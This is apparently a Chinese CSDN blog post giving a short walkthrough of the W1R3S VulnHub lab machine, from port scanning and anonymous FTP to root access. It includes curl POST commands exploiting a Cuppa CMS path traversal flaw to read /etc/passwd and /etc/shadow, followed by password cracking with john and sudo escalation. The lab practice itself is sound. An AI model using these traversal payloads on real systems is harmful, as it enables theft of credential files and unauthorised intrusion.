w1r3s靶机

最新推荐文章于 2024-09-12 13:33:30 发布
最新推荐文章于 2024-09-12 13:33:30 发布
阅读量313 收藏 3
点赞数 1
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74232792/article/details/140964210
版权

主机发现

端口目录扫描

账号密码都是Anonymous 连接ftp

查看共享文件没有发现有利信息

其中找到两个加密字段,解密过后发现被耍了, "lt is easy, but not that easy"

访问扫到的目录发现是cms,上kali找payload

查看利用方式 该cms可通过文件包含漏洞读取任意文件 http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

get请求显示404,用curl发post请求

curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.132.132/administrator/alerts/alertConfigField.php

读取shadow文件,发现两个用户,使用john工具破解

curl -X POST -d urlConfig=../../../../../../../../../etc/shadow http://192.168.132.132/administrator/alerts/alertConfigField.php

成功破解

ssh连接

ssh w1r3s@192.168.132.132

普通用户,且有全部sudo权限,sudo su root提权

.南捱
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
小白的靶机-VulnHub-W1R3S
wo41ge的博客
12-14 341
靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/ 目标:得到root权限&找到flag.txt 开机界面 就是个这 确定靶机地址:192.168.120.134 使用namp进行全盘扫面 开放了21,22,80,3306端口 80端口 竟然在 那就上web页面呗 翻了半天 每个锤子东西 使用dirb工具攻击目录 命令:dirb http://192.168.120.134 找到了几个重要的目录,/administrator、/insta
5-vulnhub W1R3S 1
weixin_45345568的博客
06-29 1066
5-vulnhub W1R3S 1 下载地址为:https://www.vulnhub.com/entry/w1r3s-101,220/ 本次的靶机ip为192.168.3.24(桥接模式自动获取) 目标:得到root权限 找到flag 一、信息搜集 1.扫描目标ip,这里使用arp-scan -l 2.扫描端口,这里使用nmap 命令为nmap -p 1-65535 -sV 192.168.3.24 nmap -p 1-65535 -sV 192.168.3.24 Starting Nmap 7.70
w1r3s 靶机学习
m0_63416413的博客
04-09 1272
w1r3s靶机学习,随手记录,参照B站RedTeamNotes的视频学习,红笔老登🤤
W1R3S靶机全通详细教程
observer的博客
07-30 1153
W1R3S靶机全通详细教程
W1R3S靶机渗透
2202_75361164的博客
04-16 480
进入FTP 中,首先就要使用binary转换成二进制模式,防止文件下载出错。, 经过处理后得到的文本信。
红队靶机渗透-W1R3S 1.0.1
m0_57967573的博客
04-29 1799
nmap扫描获得了系统的4个端口,21,22,80,3306,都是标准的服务端口;对4个端口排布之后,先看了匿名的FTP,获得了若干文件文件,逐一查看,该破解的破解,该做字符处理的字符处理;然后看了3306是禁止连接的;80端口先是目录爆破,得到3个目录wordpress、javascript、administrator,javascript是无法访问的,因为wordpress的路径问题当时没有配置成功,需要做大的调整,所以暂时放弃了这条路······
k8s环境部署dvwa靶机
09-01
k8s环境部署dvwa靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
【C++学习笔记】数组与指针(三)
qq_38196449的博客
09-09 1150
0(空字符)
UEFI学习笔记(五):EDK II PCD的概念、类型、使用
qq_44189622的博客
09-11 699
如果在BIOS里面有一些模块是binary方式集成进来的而这些binary又需要用到PCD(用于Binary Release),那么这些Binary集成的要用到的PCD就必须要设置为。PCD的值存在memory里面,下次启动时,上次更改的值丢失了,每次启动都是从default值开始。是存在VPD空间的(在FLASH上,只读),一般是出厂配置。如果platform是从源码build出来的,没有binary在里面的时候,PCD用的都是。作用域在一个模块中(模块级的),可以在Binary Level进行修改。
OJ在线判题系统项目笔记
今天不coding的博客
09-11 627
OJ在线判题系统项目笔记
C++学习笔记(10)
qq_60098634的博客
09-07 689
unordered_multimap 和 unordered_map 的区别在:unordered_multimap 允许关键字重复,而。unordered_multiset 和 unordered_set 的区别在:unordered_multiset 允许关键字重复,而。
rk3568系统buildroot开发笔记
Reasonss的博客
09-11 899
构建RK3568系统期间遇到的各种问题,我主要分为编译问题和运行问题
【学习笔记】SSL密码套件之哈希
最新发布
Taki_UP的博客
09-12 676
本篇介绍了TLS/SSL密码套件中常用的哈希算法,包括Poly1305、SHA384、SHA256、SHA、MD5
JS笔记
2201_76100326的博客
09-11 306
Math对象属于Javascript内置对象,无需实例化(不需要添加new ),可以直接使用。只有一个Math.PI的属性。
sheng的学习笔记-AI-规则学习(rule learning)
coldstarry的专栏
09-09 1031
机器学习中的“规则”(rule)通常是指语义明确、能描述数据分布所隐含的客观规律或领域概念、可写成“若……,则……”形式的逻辑规则。​“规则学习”(rule learning)是从训练数据中学习出一组能用于对未见示例进行判别的规则。一条规则形如:在数理逻辑中“文字”专指原子公式(atom)及其否定。与神经网络、支持向量机这样的“黑箱模型”相比,规则学习具有更好的可解释性,能使用户更直观地对判别过程有所了解。另一方面,数理逻辑具有极强的表达能力,绝大多数人类知识都能通过数理逻辑进行简洁的刻画和表达。
网络安全攻防靶机建设方案
"网络安全攻防靶机的设计概要涵盖了项目背景、目标、技术和实施细节,旨在构建一个逼真的网络攻防训练环境,以提升信息安全人员的实战能力。该项目由国网xxx电力有限公司xxx供电公司发起,由安徽凌慧信息科技有限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值